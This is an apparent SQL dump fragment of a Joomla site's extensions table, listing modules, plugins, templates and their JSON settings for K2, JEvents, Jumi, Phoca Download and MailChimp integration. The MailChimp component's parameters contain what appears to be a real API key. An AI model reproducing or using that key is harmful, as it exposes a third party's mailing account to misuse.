'{\"moduleclass_sfx\":\"\",\"module_usage\":\"0\",\"\":\"K2_CUSTOM_CODE_SETTINGS\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"\",\"authors_module_category\":\"\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"\",\"catfilter\":\"0\",\"category_id\":\"\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":\"0\",\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10289, 0, 'K2 Users', 'module', 'mod_k2_users', '', 0, 1, 0, 0, '{\"name\":\"K2 Users\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_MOD_K2_USERS_DESCRTIPTION\",\"group\":\"\",\"filename\":\"mod_k2_users.j25\"}', '{\"moduleclass_sfx\":\"\",\"getTemplate\":\"Default\",\"source\":\"0\",\"\":\"K2_DISPLAY_OPTIONS\",\"filter\":\"1\",\"K2UserGroup\":\"\",\"ordering\":\"1\",\"limit\":\"4\",\"userIDs\":\"\",\"userName\":\"1\",\"userAvatar\":\"1\",\"userAvatarWidthSelect\":\"custom\",\"userAvatarWidth\":\"50\",\"userDescription\":\"1\",\"userDescriptionWordLimit\":\"\",\"userURL\":\"1\",\"userEmail\":\"0\",\"userFeed\":\"1\",\"userItemCount\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10290, 0, 'K2 User', 'module', 'mod_k2_user', '', 0, 1, 0, 0, '{\"name\":\"K2 User\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_MOD_K2_USER_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_k2_user.j25\"}', '{\"moduleclass_sfx\":\"\",\"pretext\":\"\",\"\":\"K2_LOGIN_LOGOUT_REDIRECTION\",\"name\":\"1\",\"userAvatar\":\"1\",\"userAvatarWidthSelect\":\"custom\",\"userAvatarWidth\":\"50\",\"menu\":\"\",\"login\":\"\",\"logout\":\"\",\"usesecure\":\"0\",\"cache\":\"0\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10291, 0, 'K2 Quick Icons (admin)', 'module', 'mod_k2_quickicons', '', 1, 0, 2, 0, '{\"name\":\"K2 Quick Icons (admin)\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_QUICKICONS_FOR_USE_IN_THE_JOOMLA_CONTROL_PANEL_DASHBOARD_PAGE\",\"group\":\"\",\"filename\":\"mod_k2_quickicons.j25\"}', '{\"modCSSStyling\":\"1\",\"modLogo\":\"1\",\"cache\":\"0\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10292, 0, 'K2 Stats (admin)', 'module', 'mod_k2_stats', '', 1, 0, 2, 0, '{\"name\":\"K2 Stats (admin)\",\"type\":\"module\",\"creationDate\":\"September 21st, 2018\",\"author\":\"JoomlaWorks\",\"copyright\":\"Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved.\",\"authorEmail\":\"please-use-the-contact-form@joomlaworks.net\",\"authorUrl\":\"www.joomlaworks.net\",\"version\":\"2.9.0\",\"description\":\"K2_STATS_FOR_USE_IN_THE_K2_DASHBOARD_PAGE\",\"group\":\"\",\"filename\":\"mod_k2_stats.j25\"}', '{\"latestItems\":\"1\",\"popularItems\":\"1\",\"mostCommentedItems\":\"1\",\"latestComments\":\"1\",\"statistics\":\"1\",\"cache\":\"0\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10306, 0, 'isis', 'template', 'isis', '', 1, 1, 1, 0, '{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"templateColor\":\"\",\"logoFile\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0);
INSERT INTO `y57u5_extensions` (`extension_id`, `package_id`, `name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `system_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
(10307, 0, 'protostar', 'template', 'protostar', '', 0, 1, 1, 0, '{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10308, 0, 'beez3', 'template', 'beez3', '', 0, 1, 1, 0, '{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10315, 0, 'MOD_JEV_CUSTOM_MODULE_TITLE', 'module', 'mod_jevents_custom', '', 0, 1, 0, 0, '{\"name\":\"MOD_JEV_CUSTOM_MODULE_TITLE\",\"type\":\"module\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2013-2018 GWE Systems Ltd\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/www.jevents.net\",\"version\":\"3.4.48\",\"description\":\"MOD_JEV_CUSTOM_MODULE_DESC\",\"group\":\"\",\"filename\":\"mod_jevents_custom\"}', '[]', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10329, 0, 'System - Widgetkit ZOO', 'plugin', 'widgetkit_zoo', 'system', 0, 1, 1, 0, '{\"name\":\"System - Widgetkit ZOO\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"YOOtheme\",\"copyright\":\"Copyright (C) 2007 - 2013 YOOtheme GmbH\",\"authorEmail\":\"info@yootheme.com\",\"authorUrl\":\"http:\\/\\/www.yootheme.com\",\"version\":\"3.1.0\",\"description\":\"ZOO plugin for Widgetkit developed by YOOtheme (http:\\/\\/www.yootheme.com)\",\"group\":\"\",\"filename\":\"widgetkit_zoo\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10347, 0, 'IceMegaMenu Plugin', 'plugin', 'icemegamenu', 'system', 0, 1, 1, 0, '{\"name\":\"IceMegaMenu Plugin\",\"type\":\"plugin\",\"creationDate\":\"Mrch 2011\",\"author\":\"www.icetheme.com\",\"copyright\":\"Copyright (C) Copyright  2008 - 2011 IceTheme.com. All rights reserved.\",\"authorEmail\":\"info@icethemes.com\",\"authorUrl\":\"http:\\/\\/www.icethemes.com\",\"version\":\"3.0.0\",\"description\":\"IceMegaMenu plugin used in conjuction with the IceMegaMenu Module. You may change the paramters to each menu item throught the Menu Manager\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10348, 0, 'IceMegaMenu Module', 'module', 'mod_icemegamenu', '', 0, 1, 0, 0, '{\"name\":\"IceMegaMenu Module\",\"type\":\"module\",\"creationDate\":\"March 2011\",\"author\":\"IceTheme\",\"copyright\":\"GNU \\/ GPL\",\"authorEmail\":\"info@icetheme.com\",\"authorUrl\":\"http:\\/\\/www.icetheme.com\",\"version\":\"3.0.1\",\"description\":\"IceMegaMenu extension is a powerful Joomla (module + plugin) to help you take the most from the navigation system. Top features includes ability to split dropdown columns, option to load modules inside the dropdown, works without JavaScript and much more.\",\"group\":\"\"}', '{\"theme_style\":\"\",\"vertical_direction\":\"1\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"resizable_menu\":\"1\",\"\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"tag_id\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"30\",\"enable_bootrap\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10350, 0, 'RokCandy', 'component', 'com_rokcandy', '', 1, 1, 0, 0, '{\"name\":\"RokCandy\",\"type\":\"component\",\"creationDate\":\"February 24, 2015\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2015 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.0.2\",\"description\":\"\\n\\t\\tRokCandy is a simple yet powerful macro system for Joomla 1.6.  It provides the ability to create and categorize macros that can be used throughout your site.\\n\\t\",\"group\":\"\",\"filename\":\"rokcandy\"}', '{\"forcecache\":\"0\",\"adminenabled\":\"0\",\"editenabled\":\"0\",\"contentPlugin\":\"0\",\"disabled\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10351, 0, 'Button - RokCandy', 'plugin', 'rokcandy', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"Button - RokCandy\",\"type\":\"plugin\",\"creationDate\":\"February 24, 2015\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2015 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.0.2\",\"description\":\"This is an Editor Button to allow selection of RokCandy macros\",\"group\":\"\",\"filename\":\"rokcandy\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 5, 0),
(10352, 0, 'System - RokCandy', 'plugin', 'rokcandy', 'system', 0, 1, 1, 0, '{\"name\":\"System - RokCandy\",\"type\":\"plugin\",\"creationDate\":\"February 24, 2015\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2015 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"2.0.2\",\"description\":\"This is the RokCandy system plugin that performs the macro replacement\",\"group\":\"\",\"filename\":\"rokcandy\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 50, 0),
(10358, 0, 'PLG_JEV_CORE_CONTENT_PLUGIN_TITLE', 'plugin', 'jevents', 'content', 0, 1, 1, 0, '{\"name\":\"PLG_JEV_CORE_CONTENT_PLUGIN_TITLE\",\"type\":\"plugin\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2012-2018 GWE Systems Ltd\",\"authorEmail\":\"\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"PLG_JEV_CORE_CONTENT_PLUGIN_DESC\",\"group\":\"\",\"filename\":\"jevents\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10364, 0, 'hathor', 'template', 'hathor', '', 1, 1, 1, 0, '{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}', '{\"showSiteName\":\"0\",\"logoFile\":\"\",\"colourChoice\":\"0\",\"boldText\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10416, 0, 'PLG_SYSTEM_GWEJSON', 'plugin', 'gwejson', 'system', 0, 1, 1, 0, '{\"name\":\"PLG_SYSTEM_GWEJSON\",\"type\":\"plugin\",\"creationDate\":\"February 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2015-2018 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"via website\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.44\",\"description\":\"PLG_SYSTEM_JSON_EXECUTION_WRAPPER\",\"group\":\"\",\"filename\":\"gwejson\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10455, 0, 'RokCommon', 'library', 'lib_rokcommon', '', 0, 1, 1, 0, '{\"name\":\"RokCommon\",\"type\":\"library\",\"creationDate\":\"August 4, 2016\",\"author\":\"RocketTheme, LLC\",\"copyright\":\"(C) 2005 - 2016 RocketTheme, LLC. All rights reserved.\",\"authorEmail\":\"support@rockettheme.com\",\"authorUrl\":\"http:\\/\\/www.rockettheme.com\",\"version\":\"3.2.5\",\"description\":\"RokCommon Shared Library\",\"group\":\"\",\"filename\":\"lib_rokcommon\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10463, 0, 'com_jumi', 'component', 'com_jumi', '', 1, 1, 0, 0, '{\"name\":\"com_jumi\",\"type\":\"component\",\"creationDate\":\"January 2011\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (c) 2008 - 2015 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"info@2glux.com\",\"authorUrl\":\"http:\\/\\/2glux.com\\/\",\"version\":\"3.0.5\",\"description\":\"This component includes custom scripts (html, php, js, css, ...) into Joomla! pages.<br \\/>Collaboration between multiple Joomla! pages and other Jumi extensions is easy.<br \\/>For Jumi downloads and guides visit <a href=\\\"http:\\/\\/2glux.com\\/projects\\/jumi\\\" target=\\\"_blank\\\">http:\\/\\/2glux.com\\/projects\\/jumi<\\/a><br \\/>For Jumi demos, tips and tricks visit <a href=\\\"http:\\/\\/2glux.com\\/projects\\/jumi\\/tutorial\\\" target=\\\"_blank\\\">http:\\/\\/2glux.com\\/projects\\/jumi\\/tutorial<\\/a>\",\"group\":\"\",\"filename\":\"jumi\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10464, 0, 'Jumi', 'module', 'mod_jumi', '', 0, 1, 0, 0, '{\"name\":\"Jumi\",\"type\":\"module\",\"creationDate\":\"January 2011\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (c) 2006 - 2010 Martin Hajek, 2011 - 2015 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"info@2glux.com\",\"authorUrl\":\"http:\\/\\/2glux.com\",\"version\":\"3.0.1\",\"description\":\"MOD_JUMI_DESC\",\"group\":\"\",\"filename\":\"mod_jumi\"}', '{\"notepad\":\"\",\"@spacer\":\"\",\"code_written\":\"\",\"source_code_storage\":\"\",\"default_absolute_path\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10465, 0, 'System - Jumi', 'plugin', 'jumi', 'system', 0, 1, 1, 0, '{\"name\":\"System - Jumi\",\"type\":\"plugin\",\"creationDate\":\"January 2011\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (c) 2006 - 2010 Martin Hajek, 2011 - 2015 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"info@2glux.com\",\"authorUrl\":\"http:\\/\\/2glux.com\",\"version\":\"3.0.4\",\"description\":\"JUMIPLUGINDESC\",\"group\":\"\",\"filename\":\"jumi\"}', '{\"default_absolute_path\":\"\",\"hide_code\":\"0\",\"nested_replace\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10466, 0, 'System - Jumi Router', 'plugin', 'jumirouter', 'system', 0, 1, 1, 0, '{\"name\":\"System - Jumi Router\",\"type\":\"plugin\",\"creationDate\":\"January 2011\",\"author\":\"Edvard Ananyan\",\"copyright\":\"Copyright (C) 2008 - 2011 Edvard Ananyan. All rights reserved.\",\"authorEmail\":\"edo888@gmail.com\",\"authorUrl\":\"http:\\/\\/edo.webmaster.am\",\"version\":\"2.0.6\",\"description\":\"SEF routing plugin for Jumi, which will enable direct access to jumi application with it\'s alias.\",\"group\":\"\",\"filename\":\"jumirouter\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 100, 0),
(10470, 0, 'plg_installer_webinstaller', 'plugin', 'webinstaller', 'installer', 0, 1, 1, 0, '{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"28 April 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013-2017 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.1.1\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"webinstaller\"}', '{\"tab_position\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10473, 0, 'corejoomla - socials', 'plugin', 'socials', 'corejoomla', 0, 0, 1, 0, '{\"name\":\"corejoomla - socials\",\"type\":\"plugin\",\"creationDate\":\"2015-Jun-21\",\"author\":\"Maverick\",\"copyright\":\"All rights reserved by www.corejoomla.com 2009-15.\",\"authorEmail\":\"support@corejoomla.com\",\"authorUrl\":\"http:\\/\\/www.corejoomla.com\",\"version\":\"1.0.0\",\"description\":\"corejoomla social sharing plugin.\",\"group\":\"\",\"filename\":\"socials\"}', '{\"jssocials_theme\":\"flat\",\"jssocials_size\":\"12\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10483, 0, 'com_phocadownload', 'component', 'com_phocadownload', '', 1, 1, 0, 0, '{\"name\":\"com_phocadownload\",\"type\":\"component\",\"creationDate\":\"02\\/05\\/2016\",\"author\":\"Jan Pavelka (www.phoca.cz)\",\"copyright\":\"Jan Pavelka\",\"authorEmail\":\"\",\"authorUrl\":\"www.phoca.cz\",\"version\":\"3.1.2\",\"description\":\"Phoca Download\",\"group\":\"\",\"filename\":\"phocadownload\"}', '{\"filename_or_name\":\"title\",\"display_downloads\":\"1\",\"display_description\":\"3\",\"display_main_cat_desc\":\"0\",\"display_detail\":\"1\",\"display_new\":\"0\",\"display_hot\":\"0\",\"display_most_download\":\"1\",\"display_file_view\":\"0\",\"display_date_type\":\"0\",\"download_external_link\":\"_self\",\"download_metadesc\":\"\",\"download_metakey\":\"\",\"category_ordering\":\"6\",\"file_ordering\":\"6\",\"default_pagination\":\"20\",\"pagination\":\"5,10,15,20,50\",\"display_num_doc_secs\":\"0\",\"display_num_doc_secs_header\":\"1\",\"display_up_icon\":\"1\",\"display_mirror_links\":\"0\",\"display_report_link\":\"0\",\"report_link_guestbook_id\":\"\",\"tags_links\":\"0\",\"display_tags_links\":\"0\",\"license_box_height\":\"300\",\"display_category_comments\":\"0\",\"display_file_comments\":\"0\",\"fb_comment_app_id\":\"\",\"fb_comment_width\":\"550\",\"fb_comment_lang\":\"en_US\",\"fb_comment_count\":\"\",\"display_rating_file\":\"0\",\"file_icon_size\":\"16\",\"file_icon_size_md\":\"16\",\"file_icon_mime\":\"1\",\"display_specific_layout\":\"0\",\"display_bootstrap3_layout\":\"0\",\"display_play\":\"0\",\"player_width\":\"328\",\"player_height\":\"200\",\"player_mp3_height\":\"30\",\"play_popup_window\":\"0\",\"html5_play\":\"0\",\"display_preview\":\"0\",\"preview_width\":\"640\",\"preview_height\":\"480\",\"preview_popup_window\":\"0\",\"youtube_height_cv\":\"240\",\"youtube_width_cv\":\"320\",\"youtube_height_dv\":\"360\",\"youtube_width_dv\":\"480\",\"ignore_file_types_check\":\"2\",\"allowed_file_types_download\":\"{hqx=application\\/mac-binhex40} {cpt=application\\/mac-compactpro} {csv=text\\/x-comma-separated-values} {bin=application\\/macbinary} {dms=application\\/octet-stream} {lha=application\\/octet-stream} {lzh=application\\/octet-stream} {exe=application\\/octet-stream} {class=application\\/octet-stream} {psd=application\\/x-photoshop} {so=application\\/octet-stream} {sea=application\\/octet-stream} {dll=application\\/octet-stream} {oda=application\\/oda} {pdf=application\\/pdf} {ai=application\\/postscript} {eps=application\\/postscript} {ps=application\\/postscript} {smi=application\\/smil} {smil=application\\/smil} {mif=application\\/vnd.mif} {xls=application\\/vnd.ms-excel} {ppt=application\\/powerpoint} {wbxml=application\\/wbxml} {wmlc=application\\/wmlc} {dcr=application\\/x-director} {dir=application\\/x-director} {dxr=application\\/x-director} {dvi=application\\/x-dvi} {gtar=application\\/x-gtar} {gz=application\\/x-gzip} {php=application\\/x-httpd-php} {php4=application\\/x-httpd-php} {php3=application\\/x-httpd-php} {phtml=application\\/x-httpd-php} {phps=application\\/x-httpd-php-source} {js=application\\/x-javascript} {swf=application\\/x-shockwave-flash} {sit=application\\/x-stuffit} {tar=application\\/x-tar} {tgz=application\\/x-tar} {xhtml=application\\/xhtml+xml} {xht=application\\/xhtml+xml} {zip=application\\/x-zip} {mid=audio\\/midi} {midi=audio\\/midi} {mpga=audio\\/mpeg} {mp2=audio\\/mpeg} {mp3=audio\\/mpeg} {aif=audio\\/x-aiff} {aiff=audio\\/x-aiff} {aifc=audio\\/x-aiff} {ram=audio\\/x-pn-realaudio} {rm=audio\\/x-pn-realaudio} {rpm=audio\\/x-pn-realaudio-plugin} {ra=audio\\/x-realaudio} {rv=video\\/vnd.rn-realvideo} {wav=audio\\/x-wav} {bmp=image\\/bmp} {gif=image\\/gif} {jpeg=image\\/jpeg} {jpg=image\\/jpeg} {jpe=image\\/jpeg} {png=image\\/png} {tiff=image\\/tiff} {tif=image\\/tiff} {css=text\\/css} {html=text\\/html} {htm=text\\/html} {shtml=text\\/html} {txt=text\\/plain} {text=text\\/plain} {log=text\\/plain} {rtx=text\\/richtext} {rtf=text\\/rtf} {xml=text\\/xml} {xsl=text\\/xml} {mpeg=video\\/mpeg} {mpg=video\\/mpeg} {mpe=video\\/mpeg} {qt=video\\/quicktime} {mov=video\\/quicktime} {avi=video\\/x-msvideo} {flv=video\\/x-flv} {movie=video\\/x-sgi-movie} {doc=application\\/msword} {xl=application\\/excel} {eml=message\\/rfc822} {pptx=application\\/vnd.openxmlformats-officedocument.presentationml.presentation} {xlsx=application\\/vnd.openxmlformats-officedocument.spreadsheetml.sheet} {docx=application\\/vnd.openxmlformats-officedocument.wordprocessingml.document} {rar=application\\/x-rar-compressed} {odb=application\\/vnd.oasis.opendocument.database} {odc=application\\/vnd.oasis.opendocument.chart} {odf=application\\/vnd.oasis.opendocument.formula} {odg=application\\/vnd.oasis.opendocument.graphics} {odi=application\\/vnd.oasis.opendocument.image} {odm=application\\/vnd.oasis.opendocument.text-master} {odp=application\\/vnd.oasis.opendocument.presentation} {ods=application\\/vnd.oasis.opendocument.spreadsheet} {odt=application\\/vnd.oasis.opendocument.text} {sxc=application\\/vnd.sun.xml.calc} {sxd=application\\/vnd.sun.xml.draw} {sxg=application\\/vnd.sun.xml.writer.global} {sxi=application\\/vnd.sun.xml.impress} {sxm=application\\/vnd.sun.xml.math} {sxw=application\\/vnd.sun.xml.writer} {ogv=video\\/ogg} {ogg=audio\\/ogg} {mp4=video\\/mp4} {mp4=application\\/octet-stream}\",\"allowed_file_types_upload\":\"{pdf=application\\/pdf} {ppt=application\\/powerpoint} {gz=application\\/x-gzip} {tar=application\\/x-tar} {tgz=application\\/x-tar} {zip=application\\/x-zip} {bmp=image\\/bmp} {gif=image\\/gif} {jpeg=image\\/jpeg} {jpg=image\\/jpeg} {jpe=image\\/jpeg} {png=image\\/png} {tiff=image\\/tiff} {tif=image\\/tiff} {txt=text\\/plain} {mpeg=video\\/mpeg} {mpg=video\\/mpeg} {mpe=video\\/mpeg} {qt=video\\/quicktime} {mov=video\\/quicktime} {avi=video\\/x-msvideo} {flv=video\\/x-flv} {doc=application\\/msword} {ogv=video\\/ogg} {ogg=audio\\/ogg} {mp4=video\\/mp4} {mp4=application\\/octet-stream}\",\"disallowed_file_types_download\":\"\",\"disallowed_file_types_upload\":\"\",\"send_mail_download\":\"0\",\"user_files_max_count_download\":\"0\",\"enable_token_download\":\"0\",\"token_files_max_count_download\":\"0\",\"enable_user_cp\":\"0\",\"user_files_max_count\":\"5\",\"user_files_max_size\":\"20971520\",\"user_file_upload_size\":\"3145728\",\"enable_user_upload_approve\":\"0\",\"user_ucp_lang\":\"1\",\"send_mail_upload\":\"0\",\"overwrite_existing_files\":\"0\",\"pap_copy\":\"0\",\"upload_maxsize\":\"30145728\",\"enable_multiple_upload_admin\":\"1\",\"multiple_upload_method\":\"4\",\"enable_user_statistics\":\"1\",\"enable_logging\":\"0\",\"delete_existing_files\":\"0\",\"description\":\"\",\"download_folder\":\"phocadownload\",\"download_folder_pap\":\"phocadownloadpap\",\"absolute_path\":\"\",\"enable_plugin_query\":\"0\",\"enable_cache\":\"0\",\"bt_cat_col_left\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10484, 0, 'JoomailerMailchimpIntegration', 'component', 'com_joomailermailchimpintegration', '', 1, 1, 0, 0, '{\"name\":\"JoomailerMailchimpIntegration\",\"type\":\"component\",\"creationDate\":\"2016-09-24\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2009 freakedout - All rights reserved.\",\"authorEmail\":\"contact@freakedout.de\",\"authorUrl\":\"https:\\/\\/www.freakedout.de\",\"version\":\"2.5.3\",\"description\":\"joomlamailer - MailChimp integration\",\"group\":\"\",\"filename\":\"com_joomailermailchimpintegration\"}', '{\"params\":{\"MCapi\":\"0ab2c77563d1a1191f87795171eb5a8d-us11\",\"archiveDir\":\"\\/administrator\\/components\\/com_joomailermailchimpintegration\\/archive\"}}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10485, 0, 'joomlamailer - Registration', 'plugin', 'joomlamailer', 'user', 0, 0, 1, 0, '{\"name\":\"joomlamailer - Registration\",\"type\":\"plugin\",\"creationDate\":\"2015-10-10\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"https:\\/\\/www.freakedout.de\",\"version\":\"1.1\",\"description\":\"Adding newsletter options to your Joomla registration and user profile.\",\"group\":\"\",\"filename\":\"joomlamailer\"}', '{\"listid\":\"\",\"fields\":\"\",\"interests\":\"\",\"dateFormat\":\"DD\\/MM\",\"unsubscribe\":\"1\",\"sugar\":\"0\",\"highrise\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10486, 0, 'MailChimp Signup', 'module', 'mod_mailchimpsignup', '', 0, 1, 0, 0, '{\"name\":\"MailChimp Signup\",\"type\":\"module\",\"creationDate\":\"2015-01-26\",\"author\":\"freakedout\",\"copyright\":\"Copyright (C) 2015 freakedout. All rights reserved.\",\"authorEmail\":\"contact@feakedout.de\",\"authorUrl\":\"http:\\/\\/www.freakedout.de\",\"version\":\"2.1\",\"description\":\"This module allows your website visitors to subscribe to your MailChimp newsletter lists.\",\"group\":\"\",\"filename\":\"mod_mailchimpsignup\"}', '{\"intro-text\":\"\",\"outro-text-1\":\"\",\"outro-text-2\":\"\",\"thankyou\":\"Thank you! Please check your email and confirm the newsletter subscription.\",\"updateMsg\":\"You were already subscribed to this list. Your settings have been updated. Thank you!\",\"listid\":\"\",\"fields\":\"\",\"interests\":\"\",\"email-type\":\"0\",\"dateFormat\":\"%Y-%m-%d\",\"phoneFormat\":\"inter\",\"address2\":\"0\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
